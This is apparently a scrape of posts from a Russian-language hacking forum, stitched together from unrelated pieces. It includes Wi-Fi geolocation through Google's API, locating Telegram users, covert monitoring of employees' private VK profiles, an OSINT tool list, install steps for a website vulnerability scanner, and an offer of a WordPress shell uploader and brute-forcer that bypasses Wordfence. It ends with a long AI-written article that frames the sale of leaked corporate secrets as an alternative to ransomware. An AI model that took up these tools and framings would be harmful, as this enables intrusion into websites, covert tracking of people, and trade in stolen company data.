в ответе получаем координаты и указанную точность 180, которая обусловлена тем что мы в запросе использовали 2 далеко друг от друга расположенные точки, но по факту же выдаются координаты той точки у которой сильный уровень сигнала, проверено на реальных точках, точность вплоть до подъезда дома совпадает.
Если хотя бы одна из заданных в JSON файле точек в базе отсутствует, получим результат "NOT FOUND", также если в запросе указать менее 2 точек.
Полное описание Geolocation API см тут:
![developers.google.com](/proxy.php?image=https%3A%2F%2Fdevelopers.google.com%2Fstatic%2Fmaps%2Fimages%2Fgoogle- maps- platform-1200x675.png&hash=a85ac7e0d13fed53e91df41dca719a7b&return_error=1)
![developers.google.com](/proxy.php?image=https%3A%2F%2Fwww.gstatic.com%2Fdevrel- devsite%2Fprod%2Fv9e9ed563928734913447a8850ccb7e26986365be22242b631904a5bd14e09639%2Fdevelopers%2Fimages%2Ffavicon- new.png&hash=0b73267731f7c31b1c51d49113a58f90&return_error=1) developers.google.com
This technique is becoming more and more common so I wanted to share some information I found.
Куплен тариф $449 / month / Teams, самый максимальный из доступных к оплате сразу без дополнительных собеседований.
Использую официальную клиентскую библиотеку censys python.
Вопрос такого характера: ограничение на парсинг первых 50 страниц в этом пакете не обходятся совершенно никак?
Так как и из веба, и по api, как только не пробовал, сразу отрубает выдачу на 50-й странице.
Code:Copy to clipboard
CensysUnauthorizedException: 403 (Forbidden): Your account is limited to 50 pages. Visit https://search.censys.io to
upgrade.
И второй вопрос, если кто-либо писал за апгрейдом на безлимитные тарифы
Pro, Advanced, & Premium
For mature security teams with sophisticated needs.Click to expand...
у вас удалось это сделать? По второму вопросу можно в ЛС, если что, отблагодарю за информацию.
Всем здравствуйте. Как найти человека в телеграме имея только его никнейм со скриншота?
Подскажите сервис/ПО для мониторинга профилей VK сотрудников(не SMM)?
P.S. Система должна работать закрытые, приватные(с добавлением своего
аккаунта, который в друзьях у привата) и открытые профили на предмет
изменений(статусы, когда был и т.п.)
1. DeHashed - утечка учетных данных
2. SecurityTrails - расширенные данные DNS
3. DorkSearch - действительно быстрый поиск дорков
4. ExploitDB - aрхив различных эксплойтов
5. ZoomEye - сбор информации о целях
6. Pulsedive - поиск информации об угрозах
7. GrayHatWarfare - поиск общедоступных S3 бакетов
8. PolySwarm - скан файлов и url адреса на наличие угроз
9. Fofa - поиск различных сведений об угрозах
10. LeakIX - публично проиндексированная информация
11. DNSDumpster - быстрый поиск DNS-записей
12. FullHunt - поиск и обнаружение векторов атаки
13. AlienVault - обширная лента информации об угрозах
14. ONYPHE - собирает данные разведки о киберугрозах
15. Grep App - поиск в полумиллионе репозиториев git
16. URL Scan - сервис для сканирования и анализа веб-сайтов
17. Vulners - поиск уязвимостей в большой базе данных
18. WayBackMachine - просмотр контента с удаленных сайтов
19. Shodan - не требует представления
20. Netlas - поиск и мониторинг устройст, подключенных к интернету
21. CRT sh - поиск CT сертификатов
22. Wigle - база данных беспроводных сетей со статистикой
23. PublicWWW - маркетинг ресерч
24. Binary Edge - сканирует интернет на наличие угроз
25. GreyNoise - поиск устройств подключенных к интернету
26. Hunter - поиск адресов электронной почты принадлежащих веб-сайту
27. Censys - оценка поверхности атаки для устройств подключенных к интернету
28. IntelligenceX - ищет Tor, I2P, утечки данных, домены и емайл
29. Packet Storm Security - обзор последних уязвимостей и эксплойтов
30. SearchCode - ищит 75 миллиардов строк кода из 40 миллионов проектов
Spoiler: Link here
](https://anonfiles.com/E5ybh9v9zc/The_OSINT_Cyber_WAR_2021_01_11_pdf)
anonfiles.com
Enjoy. Quite interesting E-book. .
Огромный сканер - данный инструмент чем то напоминает REDHAWK, т.к основная
его работа - это сканирование сайта, и обнаружение уязвимостей.
TM-scanner - Простой скрипт на Python, инструмент для обнаружения уязвимостей
на сайтах.
Установка :
️apt update && apt upgrade && apt install git
️apt install python && apt install python2
️git clone https://github.com/TechnicalMujeeb/TM-
scanner
️cd TM-scanner
️chmod +x *
️sh install.sh
Запуск:
️python2 tmscanner.py
Далее выбираем необходимы пункт, и запускаем сканирование, также можно
загрузить необходимые утилиты, прямо в инструменте!
Wordpress Shell Uploader + Wordpress All in One Bruteforce, 10 macros
refactoring code April 2021
Bypass Wordfence
site/wp-login.php;login;pass
site/wp-login.php#login@pass
От автора:
Уважаемые участники форума, в последние годы, как вы, вероятно, знаете из средств массовой информации, случаи, связанные с так называемыми программами- вымогателями, стали более частыми. В качестве автора этой статьи, я решительно осуждаю использование этих методов для монетизации личных навыков. Цель настоящей статьи - расширить ваши горизонты и, возможно, предложить новый подход к применению вашего таланта.Так как я являюсь финансовым аналитиком и корпоративным аудитором, не обладаю лингвистическим мастерством, то мне пришлось обратиться за помощью к ИИ. Надеюсь, что отчасти сухой стиль изложения не помешает вам с удовольствием прочитать статью. Итак, давайте начнем.
Конкурентная разведка представляет собой комплексный процесс сбора, анализа и применения информации о действиях конкурентов, рыночных тенденциях и общем бизнес-климате, что необходимо для подкрепления стратегического планирования и принятия обоснованных решений в компании. Этот процесс помогает предприятиям оставаться гибкими, своевременно адаптируясь к рыночным изменениям и предвосхищая стратегические ходы конкурентов.
Основную роль в конкурентной разведке играет тщательный анализ корпоративных документов. Такие материалы, как годовые отчеты, финансовые данные, патентная информация и юридические документы, являются источниками ключевой информации об операционных стратегиях, финансовом состоянии, а также о технологических инновациях и планах компаний-конкурентов. Глубокое изучение этих данных позволяет компаниям проникать в стратегическую сущность своих конкурентов, антиципировать их будущие шаги и соответственно корректировать собственные стратегии для обеспечения конкурентных преимуществ.
Следует отметить, что особенно важной конкурентная разведка становится для компаний, работающих в сферах с высокой технологической интенсивностью, быстро меняющимися технологиями или в условиях острой конкурентной борьбы. Примером тому могут служить технологические стартапы и компании, занятые в инновационных разработках, для которых утечка уникальных технологий и интеллектуальной собственности представляет существенный риск.
Компании, действующие на глобальных рынках или в секторах с жестким регулированием, также сталкиваются с уникальными вызовами. Здесь изменения в законодательстве, политическая нестабильность и колебания валютных курсов требуют постоянного мониторинга и гибкой адаптации стратегий.
Кроме того, предприятия, работающие в областях с интенсивной конкурентной борьбой, таких как розничная торговля, электронная коммерция и телекоммуникации, должны уделять особое внимание анализу действий своих конкурентов. В этих секторах каждое новое решение конкурентов может радикально изменить рыночную ситуацию, что требует оперативного анализа и быстрой реакции для сохранения и укрепления рыночных позиций.
Подробнее рассмотрим отрасли и виды деятельности, где утечка корпоративной информации может оказать особенно существенное влияние:
Фармацевтика и Биотехнологии: В этих высококонкурентных сферах даже
малейшая утечка информации о новых исследованиях, клинических испытаниях и
формулах лекарств может подорвать исследовательские усилия и финансовые
инвестиции компаний, лишая их конкурентного преимущества на рынке.
Технологические Стартапы и ИТ-Компании: В этих инновационно
ориентированных отраслях утечка данных о новых разработках в области ИИ,
облачных технологий или кибербезопасности может катастрофически повлиять на
коммерческую жизнеспособность и технологическое лидерство компаний.
Оборонная Промышленность: Разработки в этой отрасли часто имеют
стратегическое значение. Утечка сведений о военных технологиях и оборудовании
может нарушить баланс сил и затронуть национальную безопасность стран.
Финансовый Сектор: Банки, инвестиционные фонды и страховые компании,
обладая обширными данными о финансовых операциях и клиентах, рискуют их
потерей, что может привести к серьезным финансовым убыткам и утрате доверия
клиентов.
Энергетический Сектор и Добывающая Промышленность: Информация о новых
источниках энергии, методах их добычи и геологических данных имеет
стратегическое значение, поэтому её утечка может значительно изменить рыночное
положение и стратегические планы компаний в этих отраслях.
Телекоммуникации и Связь: Данные о новейших технологиях связи и стратегиях
развития инфраструктуры являются ключевыми для поддержания
конкурентоспособности компаний в этом быстро меняющемся секторе.
Автомобильная Промышленность, включая Электромобили и Автономные
Транспортные Средства: В сфере, где инновации и разработка новых технологий
идут полным ходом, утечка информации о новых моделях и их технологиях может
негативно отразиться на конкурентной позиции компаний.
Розничная Торговля и Электронная Коммерция: Обширные данные о
потребительских предпочтениях и поведении покупателей, будучи утраченными,
могут существенно ослабить конкурентные преимущества компаний и вызвать
проблемы с защитой конфиденциальности.
Медиа и Развлекательная Индустрия: Утечка оригинального контента, такого
как фильмы, музыка или программное обеспечение, может нанести ущерб доходам и
репутации, а также правам интеллектуальной собственности.
Здравоохранение и Медицинские Услуги: Конфиденциальность медицинских
данных и личной информации пациентов имеет решающее значение. Утечка таких
данных может привести не только к юридическим проблемам, но и к утрате доверия
со стороны пациентов, что критически важно для репутации медицинских
учреждений.
Пищевая Промышленность и Напитки: Рецептуры, технологические процессы и
информация о поставках ингредиентов представляют собой ценные активы. Утечка
такой информации может привести к потере уникальности продукта и снижению
конкурентных преимуществ.
Производство Бытовой Техники и Электроники: Информация о новых
технологиях, производственных процессах и инновационных решениях может
оказаться в руках конкурентов, что позволит им ускорить свои разработки и
вывести на рынок аналогичные или улучшенные продукты.
Строительство и Инженерные Разработки: Утечка информации о строительных
проектах, архитектурных планах или инновационных строительных материалах может
подорвать конкурентные позиции компаний и привести к финансовым потерям.
Логистика и Транспорт: Сведения о маршрутах доставки, логистических
стратегиях и оптимизации перевозок представляют значительную ценность. Утечка
этих данных может привести к потере деловых преимуществ и снижению
эффективности.
Космическая Промышленность: Данные о космических технологиях,
исследовательских данных и спутниковых системах критически важны для
безопасности и технологического превосходства. Утечка информации в этой
области может иметь далеко идущие последствия как для национальной
безопасности, так и для коммерческих интересов.
Оптовая Торговля: Информация о клиентах, ценообразовании и закупочных
стратегиях играет важную роль в поддержании конкурентоспособности. Утечка
данных может негативно сказаться на отношениях с клиентами и коммерческой
стратегии.
Гостиничный Бизнес и Туризм: Сведения о стратегиях ценообразования,
управлении бронированием и маркетинговые планы могут стать добычей
конкурентов, что позволит им формировать более привлекательные предложения для
клиентов.
**Примеры Ценной Информации для Конкурентов
Планы Разработки Новых Продуктов: Ключевая Информация для Конкурентного
Преимущества**
Одной из наиболее ценных категорий информации для конкурентов являются данные
о планах разработки новых продуктов. Эта информация может включать
всесторонние детали о предстоящих товарах или услугах, начиная от начальной
концепции и заканчивая планами по выходу на рынок. Ключевыми аспектами
являются дизайн продукта, его уникальные функции и характеристики, которые
отличают его от конкурентных предложений. Кроме того, важными составляющими
являются ценовая стратегия и график запуска продукта. Понимание ценовой
стратегии конкурента позволяет компаниям скорректировать свои собственные цены
или маркетинговые стратегии для усиления конкурентных преимуществ. Также
важным является знание графика запуска, так как это даёт возможность
адаптировать собственные планы запуска продуктов, чтобы избежать прямого
столкновения на рынке или, наоборот, максимально эффективно контратаковать
конкурентные релизы. Помимо основных параметров продукта, ценна информация о
маркетинговых и продажных стратегиях, связанных с новым продуктом. Это
включает в себя каналы распространения, планы рекламных кампаний, а также
предварительные оценки спроса и потенциального воздействия на рынок. Такая
информация позволяет конкурентам не только адаптироваться к новым рыночным
вызовам, но и прогнозировать будущие тенденции, формируя свои собственные
стратегии разработки продуктов и занимая стратегически выгодные позиции на
рынке. В итоге, глубокое понимание планов разработки новых продуктов
конкурентов является ключевым фактором для выстраивания эффективной и
динамичной бизнес-стратегии.
Исследования и Разработки: Основа Инновационной Конкуренции
Информация о текущих исследованиях и разработках конкурентов представляет собой чрезвычайно ценный ресурс в динамичном мире инноваций. Эта категория данных включает подробности о недавно проведенных или текущих экспериментах, научных исследованиях, а также о разработке прототипов. Узнавая об этих аспектах, компания может получить представление о направлениях, в которых движется конкурент, включая новые технологии, продукты и процессы, что может существенно повлиять на рыночную ситуацию. Особенно важны сведения о новых технологических решениях и инновациях, которые могут изменить правила игры в отрасли. Это может включать открытия или прорывы в областях, таких как искусственный интеллект, биотехнологии, энергетика или материаловедение. Понимание этих инноваций позволяет компаниям не только предвидеть потенциальные изменения в отрасли, но и адаптировать свои собственные стратегии исследований и разработок для поддержания конкурентоспособности. Кроме того, информация о разработке новых продуктов и технологий может указывать на стратегические приоритеты конкурента и его видение будущего рынка. Это дает компаниям возможность раннего реагирования на эти стратегические изменения, будь то через собственные инновационные исследования, стратегические альянсы, поглощения или партнерства. В целом, данные о исследованиях и разработках представляют собой важный элемент для планирования собственной инновационной деятельности и управления инвестициями в исследования и разработку. Они способствуют формированию глубокого понимания текущих трендов и будущих направлений развития в отрасли, позволяя компаниям строить устойчивые и прогрессивные стратегии для обеспечения долгосрочного роста и инновационного лидерства.
Маркетинговые Стратегии и Кампании: Осведомленность для Конкурентного Превосходства
Информация о маркетинговых стратегиях и кампаниях конкурентов представляет собой ключевой ресурс для формирования собственных конкурентных тактик. Это включает знания о планируемых или запущенных маркетинговых кампаниях, стратегиях продвижения, анализе целевых аудиторий, а также методах и каналах коммуникации. Понимание того, как конкуренты позиционируют свои продукты и услуги, и какие маркетинговые сообщения они используют, может предоставить ценные инсайты для собственного позиционирования на рынке. Анализ их маркетинговых усилий дает представление о том, какие стратегии наиболее эффективны в привлечении и удержании клиентов, что позволяет оптимизировать собственные рекламные бюджеты и креативные подходы. Кроме того, информация о маркетинговых инициативах конкурентов, включая скидки, специальные предложения и лояльность бренда, может помочь компаниям адаптировать свои продажные стратегии для обеспечения конкурентного преимущества. Понимание, как конкуренты анализируют и выбирают свои целевые сегменты, а также как они управляют клиентским восприятием и лояльностью, дает возможность улучшить собственные стратегии взаимодействия с клиентами и управления брендом. Информация о маркетинговых стратегиях и кампаниях также помогает в прогнозировании будущих действий конкурентов и понимании их долгосрочных стратегических целей. Это включает в себя их подходы к цифровому маркетингу, использованию социальных медиа, контент-маркетингу и другим современным методам продвижения. Таким образом, глубокое понимание маркетинговых стратегий и кампаний конкурентов не только позволяет адаптировать и оптимизировать собственные маркетинговые усилия, но и предоставляет стратегическое преимущество в быстро меняющейся рыночной среде, где эффективное позиционирование и коммуникация являются ключами к успеху.
Финансовые Данные: Основа для Стратегического Анализа и Планирования
Финансовые данные конкурентов, включая отчеты о доходах, прибыльности, бюджетах, инвестиционных планах и структуре расходов, представляют собой неоценимый источник информации для стратегического анализа и планирования. Эти данные дают компаниям возможность глубоко понять финансовое состояние конкурентов, а также их потенциал и стратегии роста. Отчеты о доходах раскрывают основные источники доходов конкурентов, позволяя оценить, какие продукты или услуги являются наиболее прибыльными. Это может указывать на рыночные тенденции или меняющиеся предпочтения потребителей, а также дать представление о рыночных долях в различных сегментах. Анализ прибыльности помогает понять, насколько эффективно конкуренты управляют своими расходами и как это влияет на их общую финансовую устойчивость. Это может также выявить области, где конкуренты достигли оптимизации затрат, что может стать ключевым фактором в конкурентной борьбе. Информация о бюджетах и инвестиционных планах предоставляет важные данные о стратегическом направлении и приоритетах конкурентов. Понимание, куда конкуренты инвестируют свои ресурсы, может указывать на будущие рыночные возможности или угрозы и позволяет компаниям адаптировать свои стратегии соответственно. Структура расходов дает важное представление о операционной эффективности конкурентов. Анализ, как и на что конкуренты тратят свои средства, может выявить их ключевые инвестиции в технологии, исследования и разработки или маркетинг, предоставляя ценные инсайты для собственного бюджетирования и ресурсного планирования. Таким образом, финансовые данные конкурентов являются важным инструментом для формирования глубокого понимания их стратегий и операционной эффективности. Эти данные позволяют компаниям не только адаптировать и оптимизировать собственные стратегии и операции, но и прогнозировать будущие изменения в отрасли, обеспечивая стратегическое преимущество в конкурентной борьбе.
Корпоративная Стратегия и Планы Развития: Разведывательные Данные как Фундамент для Стратегического Превосходства
Информация о корпоративной стратегии и планах развития конкурентов является ключевым элементом для выработки собственной долгосрочной стратегии. Она включает в себя сведения о долгосрочных целях компаний-конкурентов, их планах по расширению, слияниям и поглощениям, а также новые инициативы на рынке. Эта информация дает компаниям возможность проникновения в стратегическое видение и направления развития своих конкурентов, что критически важно для поддержания конкурентоспособности. Понимание стратегических планов конкурентов, включая расширение на новые рынки или в новые продуктовые линии, позволяет предприятиям антиципировать будущие рыночные движения и адаптировать свои собственные стратегии в ответ. Например, если конкурент планирует вход в новый географический регион, компания может решить укрепить свое присутствие на этом рынке или искать альтернативные регионы для расширения. Информация о слияниях и поглощениях, а также о стратегических альянсах, дает представление о потенциальном изменении рыночного баланса и новых возможностях или угрозах, которые могут возникнуть в результате этих действий. Это также может выявить новые тенденции в отрасли или изменения в цепочках создания стоимости, требующие переосмысления собственных стратегических направлений. Кроме того, анализ стратегических документов, таких как отчеты для инвесторов, публичные выступления руководства и пресс-релизы, может дать представление о корпоративных ценностях и культуре конкурентов, что также является важной частью стратегического анализа. Таким образом, информация о корпоративной стратегии и планах развития конкурентов позволяет компаниям не только лучше понимать своих конкурентов и рынок в целом, но и формировать более эффективные и устойчивые собственные стратегии, обеспечивающие долгосрочный рост и успех в изменяющейся бизнес-среде.
Информация о Клиентах и Контрактах: Стратегические Инсайты для Укрепления Рыночных Позиций
Данные о ключевых клиентах, условиях контрактов, ценовых стратегиях и скидках конкурентов представляют огромную ценность для компаний, стремящихся укрепить свои рыночные позиции. Понимание кто является клиентом конкурентов, какие условия и стимулы им предлагаются, может предоставить важные инсайты для формирования собственных стратегий продаж и маркетинга. Информация о ключевых клиентах конкурентов помогает понять их рыночную ориентацию и приоритетные сегменты. Анализ этих данных может выявить потенциальные ниши или сегменты, которые могут быть недостаточно обслужены, предоставляя возможности для расширения собственной клиентской базы. Условия контрактов, включая сроки, объемы и специфические требования, дают представление о характере и глубине отношений конкурентов с их клиентами. Это позволяет оценить уровень их удовлетворенности и лояльности, что может быть использовано для разработки стратегий привлечения этих клиентов. Ценовые стратегии и информация о скидках раскрывают подход конкурентов к ценообразованию и продвижению продаж. Анализируя эти данные, компании могут настроить собственные ценовые стратегии таким образом, чтобы предложить более привлекательные условия для потенциальных клиентов, не уступая в прибыльности. Также, понимание динамики и тенденций в изменениях этих параметров может указывать на стратегические сдвиги у конкурентов или изменения в рыночных условиях, что требует адекватного ответа. В целом, информация о клиентах и контрактах конкурентов является ключевым фактором для разработки стратегий по увеличению доли рынка, укреплению отношений с клиентами и повышению общей конкурентоспособности. Она позволяет компаниям более целенаправленно и эффективно настраивать свои коммерческие усилия, уделяя особое внимание тем аспектам, которые имеют решающее значение для привлечения и удержания клиентов.
Анализ Конкурентов и Отрасли: Навигация по Рыночным Тенденциям и Выявление Новых Возможностей
Анализ конкурентов и отрасли, включающий внутренние исследования рынка, глубокий анализ действий конкурентов, а также оценку текущих и будущих рыночных тенденций, является фундаментальным элементом для успешного стратегического планирования. Этот анализ дает компаниям ценную информацию для определения своих конкурентных преимуществ и выявления новых возможностей на рынке. Внутренние исследования рынка помогают понять текущие условия и динамику отрасли, включая спрос, предложение, потребительские предпочтения и поведение. Это позволяет компаниям адаптироваться к меняющимся условиям, а также прогнозировать будущие изменения и тенденции, которые могут повлиять на их бизнес. Глубокий анализ конкурентов, включая их стратегии, продукты, рыночную долю и операционные практики, предоставляет важные данные для сравнения и выявления собственных сильных и слабых сторон. Это помогает компаниям формулировать эффективные конкурентные стратегии, включая дифференциацию продуктов, ценообразование, маркетинг и развитие клиентского сервиса. Оценка рыночных тенденций и возможностей включает анализ будущих направлений роста, новых технологий, регуляторных изменений и экономических индикаторов. Это дает компаниям возможность идентифицировать новые рыночные ниши, разработать инновационные продукты или услуги и расширить свое присутствие на новых или растущих рынках. В целом, анализ конкурентов и отрасли обеспечивает компаниям необходимые данные для принятия обоснованных решений, позволяя им оставаться на шаг впереди конкурентов и успешно навигировать в быстро меняющемся бизнес-окружении. Этот анализ является ключом к эффективному стратегическому планированию, устойчивому росту и укреплению рыночных позиций.
Информация о Сотрудниках: Ключ к Пониманию Корпоративной Культуры и Операционной Эффективности
Информация о сотрудниках конкурентов, включающая данные о ключевых сотрудниках, их квалификациях, навыках, а также аспектах корпоративной культуры и внутренних процессах, представляет собой ценный ресурс для анализа и укрепления собственной операционной эффективности и корпоративной стратегии. Понимание квалификации и навыков ключевых сотрудников конкурентов может дать представление о их способностях в инновациях, разработке продуктов и управлении. Это помогает выявить потенциальные преимущества или недостатки в команде конкурентов и адаптировать собственные стратегии найма и развития персонала для усиления конкурентоспособности. Информация о корпоративной культуре конкурентов может предоставить важные инсайты о их рабочей среде, ценностях, мотивациях и поведении сотрудников. Понимание этих аспектов может помочь в формировании собственной корпоративной культуры, которая способствует привлечению и удержанию талантливых сотрудников, улучшает моральный климат и повышает общую продуктивность. Анализ внутренних процессов конкурентов, таких как методы работы, управление проектами и операционные системы, может выявить лучшие практики или уязвимые места, что позволяет компаниям оптимизировать свои собственные процессы для повышения эффективности и снижения затрат. Кроме того, информация о текучести кадров, уровне удовлетворенности сотрудников и их вовлеченности в работу конкурентов может указывать на потенциальные проблемы в их управленческих практиках и корпоративной культуре. Это дает возможность адаптировать собственные стратегии управления человеческими ресурсами для создания более сильной и мотивированной команды. Таким образом, информация о сотрудниках конкурентов является важным элементом для построения сильной организационной структуры и корпоративной культуры. Это помогает не только в укреплении внутренних ресурсов и повышении операционной эффективности, но и в формировании привлекательного имиджа работодателя на рынке труда.
Патенты и интеллектуальная собственность
Информация о патентах и интеллектуальной собственности конкурентов, включая текущие и ожидаемые патенты, лицензии, торговые марки и авторские права, является критически важным элементом для понимания их инновационного потенциала и стратегического планирования собственной интеллектуальной собственности. Сведения о патентах позволяют оценить технологические инновации и будущие направления разработок конкурентов. Это дает представление о том, какие технологии находятся в разработке и как они могут повлиять на отраслевые тренды и рыночную динамику. Понимание патентной стратегии конкурентов помогает в формировании собственных приоритетов в исследованиях и разработках, а также в избегании нарушения чужих патентных прав. Информация о лицензиях и торговых марках дает ценные знания о рыночном позиционировании и брендовой стратегии конкурентов. Анализ этих данных помогает понять, какие продукты и услуги конкуренты защищают наиболее строго, что указывает на их ключевые рыночные активы и потенциальные направления развития. Сведения об авторских правах, особенно в отраслях, связанных с креативными и цифровыми продуктами, могут раскрыть информацию о новых продуктах и услугах, находящихся в разработке. Это важно для понимания конкурентной стратегии в областях, где контент является ключевым активом. Анализ информации о патентах и интеллектуальной собственности дает компаниям возможность оценить свои собственные инновационные усилия в контексте отраслевых стандартов, определить потенциальные риски нарушения чужих прав и исследовать возможности для лицензирования или партнерства. В целом, глубокий анализ патентов и интеллектуальной собственности конкурентов является фундаментальным для укрепления собственной стратегии инноваций и интеллектуальной собственности, позволяя не только обеспечить законное использование инновационных технологий, но и укрепить конкурентные преимущества в быстро меняющемся технологическом ландшафте.
Производственные Секреты и Процессы: Оценка Операционной Эффективности и Управления Цепочками Поставок
Информация о производственных секретах и процессах конкурентов, включая специфические методы производства, выбор поставщиков, логистические схемы и стратегии управления цепочками поставок, является важным ресурсом для улучшения собственной операционной эффективности и управленческих практик. Сведения о специфических методах производства конкурентов могут предоставить ценную информацию о новейших технологиях, эффективности процессов и качестве продукции. Понимание этих аспектов позволяет компаниям выявить потенциальные области для оптимизации собственных производственных процессов и технологических инноваций, способствующих повышению качества продукции и снижению затрат. Анализ выбора поставщиков и партнеров конкурентов дает представление о цепочках поставок отрасли, ключевых игроках на рынке и возможных преимуществах в сфере закупок. Это может помочь в поиске надежных поставщиков, оптимизации стоимости закупок и повышении эффективности собственной логистики. Изучение логистических схем и стратегий управления цепочками поставок конкурентов предоставляет информацию о лучших практиках и инновационных подходах в этой области. Компании могут использовать эту информацию для улучшения собственных логистических процессов, управления запасами и оптимизации распределения ресурсов. Также, понимание производственных секретов и процессов помогает в идентификации уникальных компетенций и возможных преимуществ конкурентов, что является критически важным для формирования стратегий дифференциации и конкурентного позиционирования на рынке. В целом, анализ производственных секретов и процессов конкурентов позволяет компаниям не только оптимизировать свои собственные операционные процессы и управление цепочками поставок, но и выявить ключевые направления для инноваций и усовершенствования, что способствует улучшению конкурентных позиций и достижению операционной превосходности.
**Применение Полученных Данных в Конкурентной Разведке (Примеры)
Разработка Продуктов и Услуг**
Возьмем в качестве примера ситуацию, когда компания узнает через конкурентную разведку о том, что основной конкурент работает над инновационной технологией в сфере возобновляемой энергии. Полученная информация позволяет компании пересмотреть собственные исследовательские приоритеты и акцентировать внимание на подобных технологиях. В результате, компания может начать разработку альтернативного или даже более совершенного продукта, используя эту информацию для ускорения собственных исследований или для избежания потенциальных технологических тупиков. Кроме того, конкурентная разведка может выявить потенциальные рынки для новых продуктов, основываясь на анализе трендов и потребительского спроса, что позволяет компании нацеливаться на определенные сегменты рынка или географические регионы с максимальной эффективностью. В конечном итоге, такой стратегический подход не только усиливает позиции компании на рынке, но и способствует более целенаправленной и инновационной разработке продуктов и услуг, что является ключом к долгосрочному успеху в динамично изменяющемся бизнес-окружении.
Стратегическое Планирование
Компания обладающая данными о планах конкурентов по расширению рыночного присутствия, может принять стратегическое решение о вложении в новые технологии или усилении маркетинговых усилий для укрепления своих позиций. Также, информация о новых продуктах конкурентов может побудить компанию к ускорению собственных исследований и разработок. Наряду с этим, понимание изменений в потребительских предпочтениях и рыночных трендах, выявленных через анализ данных конкурентов, позволяет компаниям адаптировать свои продукты и услуги, чтобы оставаться конкурентоспособными. В эпоху глобализации и быстрых технологических изменений, стратегическое планирование, опирающееся на глубокий анализ конкурентной разведки, становится неотъемлемой частью успешной бизнес-модели, обеспечивающей устойчивое развитие и рост компании в долгосрочной перспективе.
Ценообразование и Маркетинг
Ценообразование и маркетинг являются критическими аспектами бизнеса, где конкурентная разведка может играть решающую роль. Например, компания может использовать данные конкурентной разведки для оптимизации своей ценовой стратегии. Представьте, что компания обнаруживает через анализ конкурентной разведки, что основной конкурент собирается снизить цены на свои ключевые продукты. Это знание позволяет компании заранее скорректировать свои цены или разработать специальные маркетинговые предложения, чтобы поддерживать конкурентоспособность и привлекательность для потребителей. Кроме того, анализ маркетинговых стратегий конкурентов может выявить новые тренды в продвижении товаров или услуг, позволяя компании адаптировать или усовершенствовать свои собственные кампании. Например, если выясняется, что конкурент успешно использует инфлюенсер-маркетинг для привлечения молодежной аудитории, компания может рассмотреть интеграцию подобных методов в свою маркетинговую стратегию. Это также позволяет компании эффективнее целиться в своих маркетинговых кампаниях, выбирая наиболее перспективные каналы и сообщения для своей целевой аудитории. Таким образом, применение конкурентной разведки в области ценообразования и маркетинга позволяет компаниям не только реагировать на текущие рыночные условия, но и активно формировать и оптимизировать свои стратегии для достижения лучших результатов. Это обеспечивает более глубокое понимание рынка, повышает эффективность маркетинговых усилий и способствует поддержанию и укреплению позиций компании на рынке.
Управление Рисками и Сценарное Планирование
Управление рисками и сценарное планирование являются ключевыми элементами
стратегического управления, где конкурентная разведка предоставляет
необходимую информацию для выработки эффективных стратегий. Представим
ситуацию, когда компания, используя данные конкурентной разведки, выявляет
потенциальные угрозы в виде новых технологий или изменений в законодательстве,
которые могут повлиять на ее рыночную долю. Эта информация позволяет компании
разработать различные сценарии, включая наихудший, оптимальный и наиболее
вероятный исходы. Например, если предвидится ужесточение экологических норм,
компания может заранее планировать инвестиции в экологичные технологии или
изменение линейки продуктов.
Кроме того, анализ данных о конкурентах может помочь предсказать их будущие ходы, позволяя компании заранее подготовить контрмеры или альтернативные стратегии. Например, если разведданные указывают на возможное поглощение конкурентом другой компании, создающей уникальный продукт, компания может рассмотреть стратегии для сохранения своей конкурентоспособности, такие как разработка собственного инновационного продукта или поиск новых партнерских отношений. Важно отметить, что конкурентная разведка также помогает в определении внутренних рисков, например, связанных с утечкой данных или неэффективными процессами. На основе данных о лучших практиках и ошибках конкурентов, компания может оптимизировать собственные процессы и политику безопасности, тем самым снижая внутренние риски. Таким образом, использование конкурентной разведки для управления рисками и сценарного планирования позволяет компаниям не только предвидеть и эффективно реагировать на внешние угрозы, но и укреплять свою внутреннюю устойчивость, что является неотъемлемой частью успешной долгосрочной стратегии в динамично меняющемся бизнес- ландшафте.
Найм и Управление Талантами
В современном мире, где квалифицированные специалисты и таланты играют ключевую роль в успехе бизнеса, конкурентная разведка становится ценным инструментом в области найма и управления талантами. Например, компания может использовать информацию, полученную из конкурентной разведки, для выявления тенденций в сфере найма, преимуществ и недостатков компенсационных пакетов и рабочих условий, предлагаемых конкурентами. Это позволяет формировать более привлекательные предложения для потенциальных сотрудников и удерживать лучшие кадры.
Примером может служить ситуация, когда компания узнает через конкурентную разведку о повышенном интересе талантов к гибким условиям работы и возможностям профессионального роста. Используя эту информацию, компания может внести изменения в свою корпоративную культуру и политику найма, например, предлагая более гибкие графики работы или усиленные программы обучения и развития карьеры. Кроме того, конкурентная разведка может выявить слабые стороны конкурентов в управлении персоналом. Например, если становится известно о высоком уровне текучести кадров в компании-конкуренте, это может указывать на проблемы в корпоративной культуре или менеджменте. Такие сведения позволяют компании адаптировать свои стратегии управления и удержания персонала, делая акцент на улучшении тех аспектов, где конкуренты испытывают слабости. В целом, конкурентная разведка обеспечивает компаниям ценную информацию для более эффективного привлечения, развития и удержания талантов, что является ключом к поддержанию конкурентоспособности и инновационного развития в долгосрочной перспективе. Это позволяет не только сформировать мощную команду специалистов, но и создать такую корпоративную культуру, которая привлекает и мотивирует сотрудников, способствуя их профессиональному и личностному росту.
Инвестиции и Расширение
Конкурентная разведка играет критическую роль в процессах инвестирования и расширения деятельности компаний. Она предоставляет ценные данные о рыночных возможностях, конкурентной среде и потенциальных рисках, что позволяет компаниям принимать обоснованные решения о расширении и инвестициях. Например, анализируя финансовую отчетность и стратегические движения конкурентов, компания может идентифицировать насыщенные и недостаточно развитые рынки, что направляет её инвестиционные стратегии в более перспективные сегменты. Представим ситуацию, когда компания узнаёт через конкурентную разведку о планах конкурента расшириться в новый географический регион. Эта информация позволяет компании быстро реагировать: либо конкурируя за этот рынок, либо исследуя другие регионы для собственного расширения, чтобы избежать прямой конкуренции. Также конкурентная разведка может выявить тенденции инвестирования в новые технологии или отрасли, что позволит компании инвестировать в инновации и находить новые пути роста. Важно отметить, что такая разведка помогает не только в расширении, но и в минимизации рисков. Понимание стратегий и успехов конкурентов позволяет избежать повторения их ошибок и сосредоточиться на более эффективных вариантах вложений капитала. Кроме того, осведомлённость о регуляторных изменениях и политической обстановке в разных регионах может предотвратить рискованные инвестиции и уберечь ресурсы компании. Таким образом, применение конкурентной разведки для принятия решений о инвестициях и расширении позволяет компаниям не только эффективно реализовывать свои ростовые стратегии, но и снижать связанные с этим риски, обеспечивая устойчивое и стратегически обоснованное развитие в динамичной экономической среде.
